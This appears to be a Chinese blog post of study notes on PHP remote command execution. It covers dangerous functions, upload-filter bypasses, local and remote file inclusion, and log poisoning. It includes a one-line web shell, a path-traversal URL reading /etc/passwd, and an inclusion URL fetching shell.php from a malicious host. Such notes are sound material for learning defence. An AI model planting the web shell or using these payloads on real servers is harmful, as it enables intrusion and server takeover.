<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="Keep Team">
    
    <title>
        
            rce |
        
        Keep Theme
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/logo.svg">
    
    
<link rel="stylesheet" href="/font/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/font/css/regular.min.css">

    
<link rel="stylesheet" href="/font/css/solid.min.css">

    
<link rel="stylesheet" href="/font/css/brands.min.css">

    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"szkangcheng.github.io","root":"/","language":"zh-CN"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"Keep Theme","author":"Keep Team","avatar":"/images/avatar.svg","logo":"/images/logo.svg","favicon":"/images/logo.svg"},"menu":{"home":"/","archives":"/archives"},"first_screen":{"enable":false,"background_img":"/images/bg.svg","background_img_dark":"/images/bg.svg","description":"Keep writing and Keep loving.","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":false,"tag":false,"post_datetime":"updated"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":false,"min2read":false},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":false,"share":false,"reward":{"enable":false,"img_link":null,"text":null,"icon":null}},"code_block":{"tools":{"enable":false,"style":"default"},"highlight_theme":"default"},"toc":{"enable":false,"number":false,"expand_all":false,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":false,"site_uv":false,"site_pv":false,"page_pv":false}},"local_search":{"enable":false,"preload":false},"comment":{"enable":true,"use":"twikoo","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":"https://szkangcheng-test.vercel.app/twikoo","region":" ","version":"1.6.39"},"waline":{"server_url":null,"reaction":false,"version":"3.3.2"},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":false},"cdn":{"enable":false,"provider":"cdnjs"},"pjax":{"enable":false},"footer":{"since":2020,"word_count":false,"site_deploy":{"enable":false,"provider":"github","url":null},"record":{"enable":false,"list":[{"code":null,"link":null}]}},"inject":{"enable":false,"css":[null],"js":[null]},"root":"","source_data":{},"version":"4.2.5"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left flex-start border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="site-name border-box" href="/">
               Keep Theme
            </a>
        </div>

        <div class="right border-box">
            <div class="pc border-box">
                <ul class="menu-list border-box">
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/">
                                
                                首页
                                
                            </a>
                            
                        </li>
                    
                        
                        <li class="menu-item flex-start border-box">
                            <a class="menu-text-color border-box" href="/archives">
                                
                                归档
                                
                            </a>
                            
                        </li>
                    
                    
                </ul>
            </div>
            <div class="mobile border-box flex-start">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list border-box">
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/">
                            
                            首页
                        </a>
                        
                    </label>
                    
                </li>
            
                
                <li class="drawer-menu-item border-box not-sub-menu">
                    <label class="drawer-menu-label border-box">
                        <a class="drawer-menu-text-color left-side flex-start border-box" href="/archives">
                            
                            归档
                        </a>
                        
                    </label>
                    
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        rce
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/avatar.svg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">Keep Team</span>
                                
                                    <span class="author-badge">Lv1</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2025-07-05 15:05:29</span>
            </span>

            
                <span class="meta-info-item post-update-date">
                    <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                    <span class="datetime" data-updated="Sat Jul 05 2025 15:06:22 GMT+0800">2025-07-05 15:06:22</span>
                </span>
            
        

        

        

        
        
        
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body ">
                    

                    
                         <p>参考：<a class="link"   target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/649597680" >渗透测试——命令执行漏洞（RCE）详解 - 知乎<i class="fas fa-external-link-alt"></i></a></p>
<h1 id="常见rce函数"><a href="#常见rce函数" class="headerlink" title="常见rce函数"></a>常见rce函数</h1><p>1.利用系统函数实现命令执行的函数：</p>
<p>eval（）、assert（）、preg_replace（）、call_user_func（） 、如果页面中存在这些函数并且对于用户的输入没有做严格的过滤，那么就可能造成远程命令执行漏 洞 其他函数</p>
<p>ob_start（）、unserialize（）、creat_function（） 、usort（）、uasort（）、uksort（）、  array_filter（）、 array_reduce（）、 array_map（）</p>
<p>2.直接执行系统命令的代码函数</p>
<p>system（），exec（），shell_exec（），passthru（）， pcntl_exec（）， popen（），  proc_open（），反引号</p>
<h1 id="常见rce方法"><a href="#常见rce方法" class="headerlink" title="常见rce方法"></a>常见rce方法</h1><h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h2><p>上传文件（如一句话木马）</p>
<?php @system($_GET['cmd']); ?>

<p>上传到服务器后，通过访问该文件并对进行cmd传参（例如执行系统命令以查看服务器）进行rce。<br>当然使用蚁剑直接看也是更方便的</p>
<h2 id="文件上传绕过漏洞"><a href="#文件上传绕过漏洞" class="headerlink" title="文件上传绕过漏洞"></a>文件上传绕过漏洞</h2><h3 id="前端绕过"><a href="#前端绕过" class="headerlink" title="前端绕过"></a>前端绕过</h3><p>直接修改文件后缀为合适的文件，再进行抓包，修改为正常的php后缀以绕过前端检测</p>
<h3 id="后端MIME绕过"><a href="#后端MIME绕过" class="headerlink" title="后端MIME绕过"></a>后端MIME绕过</h3><p>MIME检测：检测请求包中的content-type头<br>可在请求包中修改以绕过。</p>
<h3 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h3><p>什么是文件包含？<br>当应用程序动态地包含外部文件（如脚本、配置文件或其他资源）时，如果未对用户输入进行严格的验证和过滤，攻击者可以通过构造恶意输入，使应用程序包含并执行非预期的文件，从而导致安全风险。</p>
<p>tip：不需要是一定是php文件，只要含有<?php ?>代码即可被执行，甚至代码可以不需要放在上传的文件中，只要存放在可以被执行的地方即可。</p>
<p>例如，文件限制只能上传图片，那其实可以在图片中插入php。反正能被执行就好了。</p>
<h5 id="包含函数"><a href="#包含函数" class="headerlink" title="包含函数"></a>包含函数</h5><p>在 PHP 中，<code>include</code> 和 <code>require</code> 是用于引入外部文件的两个常用函数。它们的作用是将指定文件的内容插入到当前脚本中，以便复用代码或加载依赖文件。</p>
<p>1.<strong><code>include</code> 函数</strong></p>
<ul>
<li><p><strong>作用</strong>：引入指定的文件。如果文件不存在或引入失败，PHP 会发出一个警告（<code>E_WARNING</code>），但脚本会继续执行。</p>
</li>
<li><p><strong>语法</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">include &#x27;filename.php&#x27;;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>特点</strong>：</p>
<ul>
<li>文件不存在时，脚本不会终止。</li>
<li>适合引入非核心文件，如模板文件、可选配置文件等。</li>
</ul>
</li>
<li><p><strong>示例</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">include &#x27;header.php&#x27;; // 引入 header.php 文件</span><br><span class="line">echo &quot;This is the main content.&quot;;</span><br><span class="line">include &#x27;footer.php&#x27;; // 引入 footer.php 文件</span><br></pre></td></tr></table></figure></li>
</ul>
<hr>
<ol start="2">
<li><strong><code>require</code> 函数</strong></li>
</ol>
<ul>
<li><p><strong>作用</strong>：引入指定的文件。如果文件不存在或引入失败，PHP 会发出一个致命错误（<code>E_COMPILE_ERROR</code>），并终止脚本执行。</p>
</li>
<li><p><strong>语法</strong>：</p>
<p>php</p>
<p>复制</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">require &#x27;filename.php&#x27;;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>特点</strong>：</p>
<ul>
<li>文件不存在时，脚本会终止。</li>
<li>适合引入核心文件，如类定义、函数库等。</li>
</ul>
</li>
<li><p><strong>示例</strong>：</p>
<p>php</p>
<p>复制</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">require &#x27;config.php&#x27;; // 引入配置文件</span><br><span class="line">require &#x27;functions.php&#x27;; // 引入函数库</span><br><span class="line">echo &quot;Application started.&quot;;</span><br></pre></td></tr></table></figure></li>
</ul>
<p><strong><code>3.include_once</code> 和 <code>require_once</code></strong></p>
<ul>
<li><p><strong>作用</strong>：与 <code>include</code> 和 <code>require</code> 类似，但会检查文件是否已经被引入过。如果已经引入，则不会重复引入。</p>
</li>
<li><p><strong>语法</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">include_once &#x27;filename.php&#x27;;</span><br><span class="line">require_once &#x27;filename.php&#x27;;</span><br></pre></td></tr></table></figure></li>
</ul>
<h4 id="1-本地文件包含（LFI）"><a href="#1-本地文件包含（LFI）" class="headerlink" title="1. 本地文件包含（LFI）"></a><strong>1. 本地文件包含（LFI）</strong></h4><ul>
<li><p><strong>定义</strong>：攻击者通过利用应用程序的文件包含功能，包含并执行服务器本地的文件。</p>
</li>
<li><p><strong>危害</strong>：</p>
<ul>
<li>读取敏感文件（如<code>/etc/passwd</code>、配置文件、日志文件等）。</li>
<li>执行恶意代码（如果文件内容可被解析，如PHP文件）。</li>
</ul>
</li>
<li><p><strong>示例</strong>：</p>
<ul>
<li><p>假设一个PHP应用程序有以下代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$file = $_GET[&#x27;file&#x27;];</span><br><span class="line">include($file . &#x27;.php&#x27;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>攻击者可以通过以下URL读取服务器上的敏感文件：</p>
<p><a class="link"   target="_blank" rel="noopener" href="http://example.com/index.php?file=../../../../etc/passwd" >http://example.com/index.php?file=../../../../etc/passwd<i class="fas fa-external-link-alt"></i></a></p>
</li>
</ul>
</li>
</ul>
<hr>
<h5 id="日志包含"><a href="#日志包含" class="headerlink" title="日志包含"></a>日志包含</h5><p>服务器的访问日志在Apache中会被存在&#x2F;var&#x2F;log&#x2F;apache2&#x2F;access.log中；在nginx中会被存在&#x2F;var&#x2F;log&#x2F;nginx&#x2F;access.log中<br>具体存储中包含请求方法，URL，浏览器情况等。因此可以在日志中包含我们的php。</p>
<p>例如，在user_agent头中修改，改为php木马，则访问&#x2F;var&#x2F;www&#x2F;…&#x2F;access.log头时就可以对php进行触发，达到rce的目的</p>
<h4 id="2-远程文件包含（RFI）"><a href="#2-远程文件包含（RFI）" class="headerlink" title="2. 远程文件包含（RFI）"></a><strong>2. 远程文件包含（RFI）</strong></h4><ul>
<li><p><strong>定义</strong>：攻击者通过利用应用程序的文件包含功能，包含并执行远程服务器上的文件。</p>
</li>
<li><p><strong>危害</strong>：</p>
<ul>
<li>执行远程恶意代码（如PHP Shell）。</li>
<li>完全控制服务器。</li>
</ul>
</li>
<li><p><strong>示例</strong>：</p>
<ul>
<li><p>假设一个PHP应用程序有以下代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$file = $_GET[&#x27;file&#x27;];</span><br><span class="line">include($file);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>攻击者可以通过以下URL包含并执行远程恶意脚本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?file=http://malicious-site.com/shell.php</span><br></pre></td></tr></table></figure>
</li>
<li><p>如果服务器配置允许远程文件包含，攻击者可以直接在服务器上执行任意代码。</p>
</li>
</ul>
</li>
</ul>

                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2025/07/05/SQL/"
                                   title="SQL"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">SQL</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                    </div>
                

                
                    


    <div class="comments-container border-box">
        <div id="comments-anchor" class="comment-area-title border-box">
            <i class="fas fa-comments"></i>&nbsp;评论
        </div>
        <div class="comment-plugin-fail border-box">
    <span class="fail-tip">评论插件加载失败</span>
    <button class="reload keep-button">点击重新加载</button>
</div>
<div class="comment-plugin-loading flex-center border-box">
    <i class="loading-icon fa-solid fa-spinner fa-spin"></i>
    <span class="load-tip">正在加载评论插件</span>
</div>
<script data-pjax>
  window.KeepCommentPlugin = {}
  window.KeepCommentPlugin.hideLoading = () => {
    const cplDom = document.querySelector('.comments-container .comment-plugin-loading')
    cplDom.style.display = 'none'
  }
  window.KeepCommentPlugin.loadFailHandle = () => {
    window.KeepCommentPlugin.hideLoading()
    const cpfDom = document.querySelector('.comments-container .comment-plugin-fail')
    cpfDom.style.display = 'flex'
    cpfDom.querySelector('.reload').addEventListener('click', () => {
      window.location.reload()
    })
  }
</script>

        
            

    <div class="twikoo-container">
        <div id="twikoo-comment"></div>
        <script 
                src="//cdn.jsdelivr.net/npm/twikoo@1.6.39/dist/twikoo.all.min.js"
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        ></script>
        <script 
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        >
          window.KeepCommentPlugin.initTwikoo = () => {
            if (window?.twikoo) {
              twikoo.init({
                el: '#twikoo-comment',
                envId: 'https://szkangcheng-test.vercel.app/twikoo',
                region: ' ',
                lang: 'zh-CN' || 'zh-CN'
              })
              window.KeepCommentPlugin.hideLoading()
            } else {
              setTimeout(() => {
                window.KeepCommentPlugin.initTwikoo()
              }, 1000)
            }
          }

          if ('false' === 'true') {
            setTimeout(() => {
              window.KeepCommentPlugin.initTwikoo()
            }, 1200)
          } else {
            window.addEventListener('DOMContentLoaded', window.KeepCommentPlugin.initTwikoo)
          }
        </script>
    </div>


        
    </div>





                
            </div>
        </div>

        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
    &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2025
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">Keep Team</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    

    <!-- tablet toc -->
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->


<!-- lazyload -->


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
